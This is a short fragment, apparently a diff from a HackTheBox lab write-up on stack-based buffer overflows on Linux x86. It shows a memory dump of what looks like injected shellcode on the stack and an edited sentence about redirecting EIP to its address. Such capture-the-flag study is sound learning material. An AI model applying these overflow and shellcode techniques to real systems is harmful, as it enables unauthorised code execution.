Collinformatics/HackTheBox/SkillsAssessment/Stack-Based Buffer Overflows on Linux x86/writeup.md

     0xffffd75c:	0x01010101b8489090	0x60b8485001010101
     0xffffd76c:	0x4801017579752f66	0x6f722fb848240431

-Now all we need to do is point EIP to 0xffffd75c:
+Now all we need to do is point EIP to: 0xffffd75c